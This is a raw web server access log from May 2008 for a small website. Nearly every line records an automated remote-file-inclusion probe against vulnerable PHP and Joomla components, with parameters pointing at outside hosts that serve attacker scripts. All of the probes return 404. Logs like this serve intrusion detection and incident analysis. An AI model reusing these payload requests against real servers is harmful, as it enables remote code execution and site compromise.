216.6.180.69 - - [18/May/2008:19:33:15 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:33:15 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
61.222.167.228 - - [18/May/2008:19:33:24 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
61.222.167.228 - - [18/May/2008:19:33:29 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:33:32 -0700] "GET /logs/access_080211.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:33:32 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:33:33 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:33:45 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "neighborhoodglimpses.com"
85.158.181.13 - - [18/May/2008:19:33:53 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.158.181.13 - - [18/May/2008:19:33:54 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:33:56 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:34:01 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
80.67.24.2 - - [18/May/2008:19:34:01 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:34:01 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.55.6.34 - - [18/May/2008:19:34:08 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
74.55.6.34 - - [18/May/2008:19:34:08 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "neighborhoodglimpses.com"
69.90.72.88 - - [18/May/2008:19:34:09 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
74.55.6.34 - - [18/May/2008:19:34:12 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
74.55.6.34 - - [18/May/2008:19:34:12 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:34:15 -0700] "GET /logs/access_080211.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:34:15 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
201.130.79.75 - - [18/May/2008:19:34:16 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:34:16 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
201.130.79.75 - - [18/May/2008:19:34:32 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:34:33 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
67.19.61.90 - - [18/May/2008:19:34:33 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.neighborhoodglimpses.com"
89.108.64.192 - - [18/May/2008:19:34:45 -0700] "GET /logs/access_071029.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.64.192 - - [18/May/2008:19:34:45 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.64.192 - - [18/May/2008:19:34:46 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.23.179.9 - - [18/May/2008:19:34:50 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "neighborhoodglimpses.com"
216.23.179.9 - - [18/May/2008:19:34:50 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "neighborhoodglimpses.com"
89.108.64.192 - - [18/May/2008:19:35:18 -0700] "GET /logs/access_080211.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.64.192 - - [18/May/2008:19:35:23 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.64.192 - - [18/May/2008:19:35:24 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
89.108.64.192 - - [18/May/2008:19:35:26 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
72.47.201.117 - - [18/May/2008:19:35:41 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "neighborhoodglimpses.com"
72.47.201.117 - - [18/May/2008:19:35:41 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "neighborhoodglimpses.com"
201.130.79.75 - - [18/May/2008:19:36:36 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.neighborhoodglimpses.com"
201.130.79.75 - - [18/May/2008:19:36:37 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.neighborhoodglimpses.com"
213.203.223.93 - - [18/May/2008:19:36:42 -0700] "GET /logs/access.log//inc/header.php/step_one.php?server_inc=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
213.203.223.93 - - [18/May/2008:19:36:42 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
213.203.223.93 - - [18/May/2008:19:36:42 -0700] "GET //inc/header.php/step_one.php?server_inc=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
213.203.223.93 - - [18/May/2008:19:36:43 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
213.203.223.93 - - [18/May/2008:19:36:43 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
213.203.223.93 - - [18/May/2008:19:36:43 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.neighborhoodglimpses.com"
219.117.223.106 - - [18/May/2008:19:36:44 -0700] "GET /logs/access_080211.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "neighborhoodglimpses.com"
219.117.223.106 - - [18/May/2008:19:36:45 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "neighborhoodglimpses.com"
219.117.223.106 - - [18/May/2008:19:36:45 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "neighborhoodglimpses.com"
66.249.73.227 - - [18/May/2008:19:36:57 -0700] "GET /logs/ HTTP/1.1" 200 6372 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.neighborhoodglimpses.com"
61.220.16.179 - - [18/May/2008:19:37:08 -0700] "GET /logs/access_071029.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
61.220.16.179 - - [18/May/2008:19:37:13 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
217.67.26.84 - - [18/May/2008:19:37:23 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
61.220.16.179 - - [18/May/2008:19:37:23 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
217.67.26.84 - - [18/May/2008:19:37:24 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:38:15 -0700] "GET /logs/access_071224.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:38:50 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:19:38:50 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:39:20 -0700] "GET /logs/access_071029.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:39:21 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:39:22 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:39:24 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:39:24 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:39:44 -0700] "GET /logs/access_071224.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:39:48 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:39:49 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:39:53 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.neighborhoodglimpses.com"
195.209.236.71 - - [18/May/2008:19:39:53 -0700] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.neighborhoodglimpses.com"
72.34.226.62 - - [18/May/2008:19:39:55 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/castel/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "neighborhoodglimpses.com"
72.34.226.62 - - [18/May/2008:19:39:55 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/castel/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "neighborhoodglimpses.com"
204.10.69.106 - - [18/May/2008:19:40:18 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "neighborhoodglimpses.com"
89.31.204.9 - - [18/May/2008:19:40:20 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.neighborhoodglimpses.com"
89.31.204.9 - - [18/May/2008:19:40:20 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.neighborhoodglimpses.com"
87.106.16.18 - - [18/May/2008:19:40:25 -0700] "GET /index.php?option=com_users&Itemid=&mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.82.99.126 - - [18/May/2008:19:40:32 -0700] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.neighborhoodglimpses.com"
69.56.215.66 - - [18/May/2008:19:40:36 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:40:37 -0700] "GET /logs/access_071029.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.56.215.66 - - [18/May/2008:19:40:37 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:40:43 -0700] "GET /logs/access_080211.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:40:43 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:40:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
195.82.99.126 - - [18/May/2008:19:40:44 -0700] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:40:54 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:19:41:02 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.56.215.66 - - [18/May/2008:19:41:13 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "neighborhoodglimpses.com"
69.56.215.66 - - [18/May/2008:19:41:14 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "neighborhoodglimpses.com"
204.10.69.106 - - [18/May/2008:19:41:23 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.neighborhoodglimpses.com"
61.220.16.179 - - [18/May/2008:19:41:40 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:42:08 -0700] "GET /logs/access_071224.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
85.158.181.13 - - [18/May/2008:19:42:30 -0700] "GET /logs/access_080211.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.158.181.13 - - [18/May/2008:19:42:31 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.158.181.13 - - [18/May/2008:19:42:31 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:42:37 -0700] "GET /logs/access_080211.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:42:38 -0700] "GET /components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.207.131.21 - - [18/May/2008:19:42:38 -0700] "GET /logs/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:43:39 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:43:39 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:43:40 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:43:51 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:43:51 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:19:43:55 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
89.108.64.192 - - [18/May/2008:19:43:58 -0700] "GET /logs/access_071224.log/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
217.31.58.188 - - [18/May/2008:19:44:13 -0700] "GET /logs/access_080211.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
